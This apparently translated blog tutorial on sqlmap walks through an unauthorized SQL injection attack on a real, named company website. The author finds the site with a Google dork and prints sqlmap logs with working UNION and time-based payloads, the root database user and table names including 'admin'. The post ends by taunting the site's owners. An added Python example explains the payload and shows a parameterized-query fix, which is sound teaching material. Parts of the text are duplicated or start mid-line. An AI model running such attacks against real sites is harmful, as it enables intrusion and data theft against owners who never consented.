sqlmap injection for beginners


1 What is sqlmap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

sqlmap is an open-source tool that automatically detects and exploits SQL injection vulnerabilities and takes over database servers. It has a powerful detection engine and many useful features for probing the server and taking over the database server.

** In short, sqlmap is a site-takeover tool.

2 Installation

  Python 2.6 or 2.7; note that only these two major versions apply to the 1.0-dev build used below (current sqlmap releases also run on Python 3). sqlmap can be installed with easy_install or fetched from the repository with git clone.

3 Finding a target

  Google hacking, of course: inurl:".php?id=

  Let's just try the second result: www.cowinbio.com/about/index.php?id=1

  Let's get started.

 blind (heavy query)' injectable
[10:07:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:07:47] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:07:49] [INFO] target URL appears to be UNION injectable with 2 columns
[10:07:49] [WARNING] combined UNION/error-based SQL injection case found on column 1. sqlmap will try to find another column with better characteristics
[10:07:49] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 2626 HTTP(s) requests:
---
Parameter: id (GET)
    Type: AND/OR time-based blind

Then

         _
 ___ ___| |_____ ___ ___  {1.0-dev-c6d4217}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:15:04

you provided 'MySQL' as a back-end DBMS, but from a past scan information on the target URL sqlmap assumes the back-end DBMS is 'mysql <5.0.11'. Do you really want to force the back-end DBMS value? [y/N] y
[10:15:22] [INFO] testing connection to the target URL
[10:15:22] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
[10:15:22] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: id=1 AND 5889=BENCHMARK(5000000,MD5(0x6d6c765a))

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=-2036 UNION ALL SELECT CONCAT(0x716a767a71,0x674971454552444a7
7526b7971714d71694b6b5a506f4c69575349416a704b705458645a554f6d,0x7162766271),NULL-- -
---
[10:15:23] [INFO] testing MySQL
[10:15:23] [INFO] confirming MySQL
[10:15:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9
back-end DBMS: MySQL < 5.0.0
[10:15:23] [INFO] fetching current user
current user:    'root@localhost'

And after that

[*] starting at 10:16:44

[10:16:44] [INFO] testing connection to the target URL
[10:16:44] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
[10:16:44] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: id=1 AND 5889=BENCHMARK(5000000,MD5(0x6d6c765a))

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=-2036 UNION ALL SELECT CONCAT(0x716a767a71,0x674971454552444a79
7526b7971714d71694b6b5a506f4c69575349416a704b705458645a554f6d,0x7162766271),NULL-- -
---
[10:16:45] [INFO] testing MySQL
[10:16:45] [INFO] confirming MySQL
[10:16:45] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9
back-end DBMS: MySQL < 5.0.0
[10:16:45] [INFO] fetching current database
current database:    'cw'
Database: cw
[3 tables]
+---------+
| admin   |
| news    |
| product |
+---------+
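What the two payloads in the logs above actually do, shown as an added example that is not code from the original post or from sqlmap. It rebuilds the UNION finding against an in-memory SQLite database. Everything about the target's application is an assumption, because the post shows none of its source: a `news` table with an integer `id`, a two-column SELECT (matching the "2 columns" sqlmap found), and the request parameter pasted straight into the SQL text. SQLite stands in for MySQL, so MySQL's CONCAT(0x..) is rewritten with X'..' blob literals and ||, and the BENCHMARK time-based payload cannot be reproduced here at all. The marker bytes 0x716a767a71 and 0x7162766271 are exactly the ones sqlmap printed; the text placed between them is a constructed stand-in for sqlmap's random string, and the example also walks through the column-count probing that the "NULL - 1 to 20 columns" test performs.

```python
import re
import sqlite3

# Hex literals from the sqlmap log above. sqlmap brackets each value it extracts
# with a random start/stop marker so it can locate the value in any HTML response.
START_MARKER_HEX = "716a767a71"   # 0x716a767a71 in the page's payload
STOP_MARKER_HEX = "7162766271"    # 0x7162766271 in the page's payload


def decode_hex_literal(hex_digits: str) -> str:
    """Decode the digits of a MySQL 0x... literal into text."""
    return bytes.fromhex(hex_digits).decode("ascii")


def setup_db() -> sqlite3.Connection:
    """Constructed sample data: a `news` table like the one sqlmap listed (schema assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO news VALUES (1, 'Welcome', 'first article');
        INSERT INTO news VALUES (2, 'Update', 'second article');
        """
    )
    return conn


def fetch_news_vulnerable(conn: sqlite3.Connection, raw_id: str) -> list:
    """Hypothesised vulnerable query: the request parameter is pasted into the SQL text."""
    return conn.execute(f"SELECT title, body FROM news WHERE id={raw_id}").fetchall()


def fetch_news_safe(conn: sqlite3.Connection, raw_id: str) -> list:
    """Hardened version: the parameter is bound, so it can never become SQL syntax."""
    return conn.execute("SELECT title, body FROM news WHERE id=?", (raw_id,)).fetchall()


def find_union_column_count(conn: sqlite3.Connection, max_columns: int = 20) -> int:
    """The 'Generic UNION query (NULL) - 1 to 20 columns' test: append NULLs until
    the database stops complaining about a column-count mismatch."""
    for n in range(1, max_columns + 1):
        probe = "-1 UNION ALL SELECT " + ", ".join(["NULL"] * n) + "-- -"
        try:
            fetch_news_vulnerable(conn, probe)
            return n
        except sqlite3.OperationalError:
            continue
    return 0


def union_payload(random_text: str, columns: int) -> str:
    """Same shape as the page's payload: a negative id so the legitimate SELECT
    returns no row, the marked value in column 1, NULL padding for the rest,
    and a trailing comment to swallow whatever followed the id in the query."""
    marked = (f"CAST(X'{START_MARKER_HEX}' AS TEXT) || '{random_text}' || "
              f"CAST(X'{STOP_MARKER_HEX}' AS TEXT)")
    return f"-2036 UNION ALL SELECT {marked}{', NULL' * (columns - 1)}-- -"


def extract_marked_value(response_text: str):
    """What sqlmap does with the response: return whatever sits between the markers."""
    start, stop = decode_hex_literal(START_MARKER_HEX), decode_hex_literal(STOP_MARKER_HEX)
    match = re.search(re.escape(start) + "(.*?)" + re.escape(stop), response_text, re.S)
    return match.group(1) if match else None


def demo() -> dict:
    conn = setup_db()
    columns = find_union_column_count(conn)          # 2, as in the log
    payload = union_payload("abc123", columns)       # 'abc123' is a constructed stand-in
    rows = fetch_news_vulnerable(conn, payload)
    # Render the rows the way a page template would, then read them back like sqlmap.
    page = " ".join(str(col) for row in rows for col in row)
    return {
        "columns": columns,
        "vulnerable_rows": rows,
        "marker_value": extract_marked_value(page),
        "safe_rows": fetch_news_safe(conn, payload),  # bound parameter: matches nothing
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The BENCHMARK payload in the log is sqlmap's time-based fallback: the server was fingerprinted as MySQL older than 5.0.12, which has no SLEEP(), so sqlmap measures the delay of 5,000,000 MD5 computations instead. The fix in fetch_news_safe is the whole lesson: with a bound parameter the same payload is compared against the id column as an opaque value and returns no row.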

Let's stop here. After all, this is a blog post. I did not go any deeper, and I hope readers will not try to go any further either.

Also, a friendly reminder to this site: you are not very secure.

I solemnly declare that the article above is my original work; please credit the source when reposting. 小三爺 thanks you here~~.

 

